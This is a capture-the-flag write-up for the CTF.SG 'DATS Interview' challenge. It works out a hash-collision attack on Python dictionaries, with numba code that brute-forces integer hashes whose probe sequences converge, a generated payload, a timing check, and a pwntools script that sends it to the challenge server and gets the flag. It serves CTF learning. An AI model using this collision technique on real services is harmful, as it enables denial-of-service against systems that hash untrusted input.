# DATS Interview

Unfortunately, I did not solve this live during the CTF.SG competition. There were unintended solutions that involve the server not checking for negative values, but since we don't have the server code I did not explore these, and assumed that the specifications given on the PDF were golden.

The code that is used to solve the Stone Statues problem looks simple enough, and I think I managed to convince myself that it is logically sound and does not produce incorrect answers. In that case, the vulnerability must be in the 10-second limit, but I wasn't entirely sure how to make it slow enough.

The intended solution path mentioned after the hunt ended was about the dictionary hash, and in hindsight this is actually kind of obvious, so this write-up is an attempt to solve it as such. 

The idea is that it takes linear time to add `n` elements into a dictionary, but only if we expect the hashes to be well-behaved. In the worst case where every element turns out to have the same hash, then we'd need quadratic time, since each insertion would first need to check that none of the previous elements (that have the same hash) are in fact the same element.

The strategy python dictionaries use to resolve hash collisions is called [Open addressing](https://en.wikipedia.org/wiki/Open_addressing), and in particular here's a great explanation of [how python dictionaries work](https://tenthousandmeters.com/blog/python-behind-the-scenes-10-how-python-dictionaries-work/), or better yet [an explorable explanation](https://just-taking-a-ride.com/inside_python_dict/chapter4.html).

---

So first things first, can we actually have 100000 elements resolving to the same hash? It turns out that hashing an integer is just taking it mod $2^{61}-1$, so because of the `long long` limit we can only have 8-9 elements for any given hash.

We know to due the 2/3-load factor that a dictionary with 100000 elements must have a table size of $2^{18}=262144$, so that any two integers differing by a multiple of 262144 must end up in the same initial bucket. However, because their hash is not identical, these upper bits of the hash are use to make them probe into different trajectories. What we want to do is force these different hashes to eventually resolve to the same trajectory.

Fortunately we can have 8 copies of each hash, so that for each hash we have 8 "attempts" to get it into a trajectory of interest. For example, consider the starting value 47933, which will have the following trajectory:
![47933](dats47933.png)

The red arrows here means that it's perturbed, and subsequently after the first three reds the hash will hash shifted enough to reach no perturbation, so that it ends up in the same trajectory as zero. The important point here, is that in this example you need at least four copies of the hash for it to do something substantial here: the first three are simply dummies. In general, since we can make 8 copies of each hash, we can allow for seven perturbations. All-in-all, this means that we have a runtime of $O\left(\left(\frac{n}{8}\right)^2\right)$, which is quadratic.

All that remains is to find 12500 such hashes that enter the zero trajectory within 7 steps. We will just brute force over a big enough range and collect all such candidates. We use `numba.jit` to speed things up.

In [1]:
from numba import jit
import numpy as np

@jit(nopython=True)
def find_collisions_to_zero():
    result = np.empty(12501, 'uint64')
    result[12500] = 2**61 - 1
    
    count = 0
    for hash_value in range(2**32):
        mask = 2**18 - 1
        perturb = hash_value
        probe = hash_value & mask
        for i in range(7):
            perturb >>= 5
            if perturb == 0 and probe == 0:
                result[count] = hash_value
                count += 1
                if count == 12500:
                    return result
                break
            probe = (probe * 5 + perturb + 1) & mask

collisions = find_collisions_to_zero()
collisions

array([                  0,               17906,               27009, ...,
                2244121148,          2244406662, 2305843009213693951],
      dtype=uint64)

Success! We have managed to find 12500 such values. Now we just need to turn it back into the form required by the question.

In [2]:
payload = ' '.join(map(str, list(np.diff(collisions)) * 8))
payload[:100]

'17906 9103 20924 17906 71291 89614 47933 25342 81361 47933 8253 138864 47933 89614 47933 23358 47933'

We only show the first 100 characters above, but basically we take a diff between consecutive values to represent Salokin statues, and at the end we make it jump to $2^{61}-1$. Then we make eight copies of the whole thing. Anyway, let's make our own approximation of how fast we think tennek can run this.

In [3]:
%time len({i:0 for i in np.cumsum([0]+list(map(int,payload.split())), dtype='uint64')})

CPU times: user 20.5 s, sys: 157 µs, total: 20.5 s
Wall time: 20.5 s


100001

Sounds good. All that's left to do is just feed it in and get the flag.

In [4]:
from pwn import *
import numpy as np

sh = remote('chals.ctf.sg', 20401)
sh.recvuntil(b'case...\n')
sh.sendline(b'100000')
sh.sendline(b'2')
sh.sendline(payload.encode())
sh.sendline(b'-1 -1')
sh.recvall()

[x] Opening connection to chals.ctf.sg on port 20401
[x] Opening connection to chals.ctf.sg on port 20401: Trying 178.128.20.61
[+] Opening connection to chals.ctf.sg on port 20401: Done
[x] Receiving all data
[x] Receiving all data: 19B
[x] Receiving all data: 57B
[x] Receiving all data: 65B
[x] Receiving all data: 124B
[x] Receiving all data: 187B
[x] Receiving all data: 188B
[x] Receiving all data: 225B
[x] Receiving all data: 259B
[+] Receiving all data: Done (259B)
[*] Closed connection to chals.ctf.sg port 20401
b"1st line of input: 2nd line of input: 3rd line of input: Answer: Verifying answer correctness... This might take a while...\nOK, answer is verified correct, running on Tennek's code now...\nTime limit exceeded! Congratulations!\nCTFSG{Uncompetitive_Programming}\n"
